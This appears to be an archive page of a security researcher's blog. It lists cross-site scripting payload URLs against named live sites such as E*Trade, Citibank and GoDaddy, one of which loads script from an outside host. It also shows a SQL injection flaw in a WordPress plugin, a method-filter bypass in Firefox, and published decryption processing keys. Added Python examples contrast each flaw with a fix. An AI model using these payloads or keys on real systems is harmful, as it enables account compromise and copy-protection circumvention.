-
Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See RSnake’s cheat sheet for examples.
https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E
https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))
https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))
https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))
https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl (nav and subnav are also vulnerable parameters)
-
iriStatAppend()
    // URL (requested)
    $urlRequested = iri_StatPress_URL();
    ...
    // referrer is HTML-encoded only; nothing SQL-escapes it before it is interpolated below
    $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : '');
    ...
    $insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) "
        . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')";
    $results = $wpdb->query($insert);

iri_StatPress_Vars()
    if (strpos(strtolower($body), "%thistotalvisits%") !== false) {
        $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]
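Added example, not the plugin’s code: a Python stand-in for the iriStatAppend() insert above, run against an in-memory SQLite table. It shows why HTML-encoding the referrer does nothing to keep it inside the SQL string (PHP’s htmlentities() under its old default flag ENT_COMPAT leaves the single quote untouched), beside a parameterised version of the same insert. The table layout, IP and Referer value are constructed for the demo.

```python
import html
import sqlite3

def php_htmlentities_compat(s: str) -> str:
    # Approximates PHP htmlentities() with its old default flag ENT_COMPAT:
    # & < > and " are encoded, the single quote passes through untouched.
    return html.escape(s, quote=False).replace('"', "&quot;")

def new_db() -> sqlite3.Connection:
    # Constructed stand-in for the plugin's table, reduced to two columns.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_statpress (ip TEXT, referrer TEXT)")
    return con

def log_visit_vulnerable(con, ip: str, referrer: str) -> int:
    # Mirrors the shape of iriStatAppend(): the referrer is HTML-encoded but
    # never SQL-escaped before being spliced into the INSERT string.
    ref = php_htmlentities_compat(referrer)
    con.execute(f"INSERT INTO wp_statpress (ip, referrer) VALUES ('{ip}','{ref}')")
    return con.execute("SELECT count(*) FROM wp_statpress").fetchone()[0]

def log_visit_hardened(con, ip: str, referrer: str) -> int:
    # Parameterised query: the driver passes the referrer as data, so quotes in
    # it cannot alter the statement. Encode for HTML at output time, not here.
    con.execute("INSERT INTO wp_statpress (ip, referrer) VALUES (?, ?)", (ip, referrer))
    return con.execute("SELECT count(*) FROM wp_statpress").fetchone()[0]

# Constructed Referer header value: the single quote survives htmlentities()
# unchanged, so it closes the string and the row tuple and opens a second row.
HOSTILE_REFERER = "http://example.test/'),('0.0.0.0','injected"

def demo():
    # Returns (rows after vulnerable insert, rows after hardened insert).
    vuln = log_visit_vulnerable(new_db(), "198.51.100.7", HOSTILE_REFERER)
    hard = log_visit_hardened(new_db(), "198.51.100.7", HOSTILE_REFERER)
    return vuln, hard  # (2, 1): one request wrote two rows on the vulnerable path

if __name__ == "__main__":
    print(demo())
```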
-
If anyone is interested, Technorati is full of bugs like this.
http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.technorati.com/404please%27);alert(1);//
http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
[POST] http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
-
Free stumbles anyone?
http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E
http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
-
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
-
Anyone want to take over a few domains?
https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22
https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22
https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1)
It’s scary how full of holes godaddy.com is; this is just a sample of what I saw while I was transferring my domains to webfaction.
-
I redesigned, well picked a new theme, and moved the site to a new hosting company today. I have been severely neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things. I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or [...]
-
w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these [...]
-
A little off topic but if you are a fan of the Sox, or just like baseball you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiving-double-play-catch from a few nights ago: http://www.mlb.com/media/video_sl.jsp?video=200805142699480
-
The past few months haven’t exactly been slow for me, hence the lack of new content here. There has been a lot of interesting stuff happening over the past 2 months; I will try to point out the things I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that [...]
-
‘Mantis is a free popular web-based bugtracking system’ - http://www.mantisbt.org/ I didn’t audit this, I don’t want to audit this, I just found it while using Mantis. There may be more, but this is what I got: /view_filters_page.php?for_screen=1&target_field=show_category[]%22;alert(1);x=%22
-
February was a very busy month for me, which makes it a slow month for hiredhacker.com. I did change hosts, but that was about it. Between the XBox 360, and my new iPhone I am lucky I even did any real work. Hopefully March will be a better month for hiredhacker and I will get [...]
-
pymsrpc is an attempt to develop a working library for communicating with remote Microsoft RPC endpoints. It includes an IDL parser and NDR data types for making requests.
I wanted to get this up here in case you haven’t heard that Cody Pierce and Aaron Portnoy have released PyMSRPC. I personally have been very excited [...]
-
The WP Contact Form III 1.4.1 WordPress plugin by ‘KristinKWangen’ is vulnerable to multiple cross site scripting attacks. Note to developers, this does not stop script injection attacks:
From wp-contactform.php line 105:
    $_POST['wpcf_your_name'] = stripslashes(trim($_POST['wpcf_your_name']));
Also note that this is not a very good way to die:
From buttonsnap.php line 28:
    $selection = isset($_POST['selection']) ? $_POST['selection'] : @$_GET['selection'];
    $selection = apply_filters($dispatch, $selection);
    die($selection);
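Added example, not the plugin’s code: a Python emulation of the stripslashes(trim()) step from line 105 above, showing that it only strips backslashes and leaves markup exactly as submitted, beside output-time HTML encoding, which is what actually stops a reflected script in a page that echoes the value the way die($selection) does. The form value is constructed.

```python
import html

def php_stripslashes(s: str) -> str:
    # Emulates PHP stripslashes(): removes one level of backslash escaping
    # (a magic_quotes_gpc artefact); a lone trailing backslash is dropped.
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def plugin_sanitize(value: str) -> str:
    # What the plugin does on line 105: trim, then stripslashes. Neither call
    # knows anything about HTML, so < > " and script tags come through intact.
    return php_stripslashes(value.strip())

def render_unsafe(name: str) -> str:
    # Echoing the "sanitized" value straight into markup, as die($selection) does.
    return f"<p>Thanks, {plugin_sanitize(name)}!</p>"

def render_safe(name: str) -> str:
    # The fix is context-appropriate encoding at the point of output.
    return f"<p>Thanks, {html.escape(plugin_sanitize(name), quote=True)}!</p>"

def contains_script_tag(markup: str) -> bool:
    return "<script" in markup.lower()

SAMPLE = "  Bob <script>alert(1)</script>  "  # constructed form field value

if __name__ == "__main__":
    print(render_unsafe(SAMPLE))
    print(render_safe(SAMPLE))
```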
-
Ronald has started a router hacking challenge over on 0x000000.com. It’s an interesting topic, and something I have explored in the past with good results. Take a look and send him your findings.
-
Over the past few days I have been experiencing some intermittent problems with my hosting provider. They have been short term, random, and not that severe, but nonetheless it pisses me off and annoys the shit out of me. Needless to say I will be switching providers over the weekend, so if there [...]
-
iPhone Key:
18 84 58 A6 D1 50 34 DF E3 86 F2 3B 61 D4 37 74
HD-DVD Processing Key:
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
New AACS Processing Key:
45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
Any More?
-
Mozilla marked Bug ID 413250 as ‘RESOLVED FIXED’ on Tuesday. I got a chance to check out the fix today, and found that the fix is inadequate in stopping the attack. Here’s another demo that reads your session store, and like before, uses the Download Statusbar extension.
steal_sessionstore2.html.
-
If you haven’t played with NotchUp.com yet, you should take a look. It seems like a very promising site. I mean come on, who wouldn’t want to get paid to interview for a job? If you think it’s all small companies for small money, it’s not. Facebook and Google are both very active, making offers [...]
-
I spent some time tonight with scripting access to chrome files and found that Firefox doesn’t properly handle escaped characters. It’s possible to load any javascript file on a victim’s machine. This attack is similar to previously disclosed vulnerabilities but is not constrained to basic Firefox files.
To exploit this the victim needs to have [...]
-
This was released on Dec. 25th, and I am just getting around to posting it… such a slacker, anyway: http://www.ollydbg.de/version2.html
-
Gregory Piñero has released Exe_Dump_Utility, a web enabled wrapper for pefile. pefile is obviously more powerful and robust, but it’s still very cool and worth looking at.
-
I grabbed this off of some hacked servers in China, nothing special but some people were asking for it. Drop me a line and I will email the actual html/js files if you’re interested. Sorry for the bad formatting, but you get the point.
-
WassUp is a new WordPress plugin to track your visitors in real time. It has a very readable and fancy admin console to keep track of your blog’s users’ visits. It has a “current visitors online” view and a more detailed “visitors details” view where you can know almost everything your users are doing on [...]
-
RSnake has started a ‘Diminutive XSS Worm Replication Contest’ and in doing so has sparked a really interesting thread on sla.ckers.org. Definitely worth the read and to keep an eye on.
-
Here ya go:
StumbleUpon.com
YouTube.com
-
I was looking over some of Mozilla’s XMLHTTPRequest code, and noticed this snippet at nsXMLHttpRequest.cpp:915
    // Disallow HTTP/1.1 TRACE method (see bug 302489)
    // and MS IIS equivalent TRACK (see bug 381264)
    if (method.LowerCaseEqualsASCII("trace") ||
        method.LowerCaseEqualsASCII("track")) {
      return NS_ERROR_INVALID_ARG;
    }
Which led me to do:
    var xhr = new XMLHttpRequest();
    xhr.open('%trace', '/', false);
    xhr.send('');
    alert(xhr.responseText);
When I was testing I was using [...]
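Added example, not Mozilla’s code: the check above is a deny-list compared against the raw method string, so a spelling such as '%trace' is simply not equal to 'trace' and is let through. The Python below puts that shape beside an allow-list that normalises the method (trim, percent-decode, case-fold) before judging it and refuses anything not spelled plainly; the method sets and sample inputs are my own.

```python
from urllib.parse import unquote

# Method sets chosen for the example; the excerpt itself only names TRACE/TRACK.
FORBIDDEN = {"TRACE", "TRACK"}
ALLOWED = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}

def denylist_check(method: str) -> bool:
    """Same shape as the nsXMLHttpRequest.cpp test: reject an exact,
    case-insensitive match of a forbidden name and let anything else through."""
    return method.lower() not in {m.lower() for m in FORBIDDEN}

def canonical(method: str) -> str:
    # Normalise before judging: strip surrounding whitespace, undo one level of
    # percent-encoding, case-fold. '%trace' holds no valid escape and stays
    # '%TRACE'; 'tr%61ce' decodes to 'TRACE'.
    return unquote(method.strip()).upper()

def allowlist_check(method: str) -> bool:
    """Accept only a known method spelled plainly: the canonical form must be in
    ALLOWED and must equal the trimmed, upper-cased raw input, so an encoded
    spelling of an allowed verb is refused too."""
    canon = canonical(method)
    if canon in FORBIDDEN:
        return False
    return canon in ALLOWED and canon == method.strip().upper()

def compare(samples):
    """Map each sample method to (deny-list verdict, allow-list verdict), True = accepted."""
    return {m: (denylist_check(m), allowlist_check(m)) for m in samples}

if __name__ == "__main__":
    results = compare(["GET", "TRACE", "%trace", "tr%61ce", " trace", "G%45T"])
    for m, (deny, allow) in results.items():
        print(f"{m!r:10} denylist={'pass' if deny else 'block'} "
              f"allowlist={'pass' if allow else 'block'}")
```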
-
I had some free time today and after about 10 minutes of poking around AOL’s web services, I came to the conclusion that their developers have no concept of security. Every AOL domain I looked at had multiple XSS holes on basically every page. They ranged from random subdomains like:
http://autos.aol.com/
http://finance.aol.com/
To more serious domains like:
http://webmail.aol.com/ (need [...]
-
Maltego (formerly Evolution) is a great tool for examining relationships between entities (People, Domains, IP addresses, Files, etc). I first heard of Evolution during H.D. Moore’s and Valsmith’s ‘Tactical Exploitation’ talk (Paper, DefCon Video) at Blackhat 2007.
Maltego is available as a standalone Java application or a Web based application. If anyone is interested I [...]
-
Before I get into this post, I should give you a little background on what I do day-to-day. In a typical week I do a wide range of work; mainly it revolves around reverse engineering, exploit development, vulnerability analysis, penetration testing, etc. The nature of my (and many other researchers in my shoes) work [...]
-
It’s been a long time coming, but we are finally getting around to upgrading hiredhacker.com. Over the next week or two you will notice some small and not so small changes happening.
-
“Research within the area of web browser security, particularly Browser Exploitation Frameworks, Cross-site scripting Viruses and Inter-Protocol Communication has become a catalyst for further exploration into Inter-Protocol Exploitation. That is, an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a [...]
-
I was going through old bookmarks when I came across id’s rant on resumes. If you haven’t read it, you’re missing out. It is one of the funniest things I have ever read.
http://www.fthe.net/blog/?p=13
-
Researchers at Darmstadt Technical University in Germany have updated an attack on RC4 that enabled them to crack 104 bit WEP in under 60 seconds. Their full paper is available here.
-
Microsoft released a patch today to combat the recent ANI vulnerability along with 6 other critical vulnerabilities. Full details with patch download: http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx
Warning:
The patch is causing some problems for users of the Realtek HD Audio Control Panel, find out more here.
-
At BlackHat Amsterdam Nitin and Vipin Kumar released VBootkit which subverts Vista’s code signing mechanisms. Find out more here.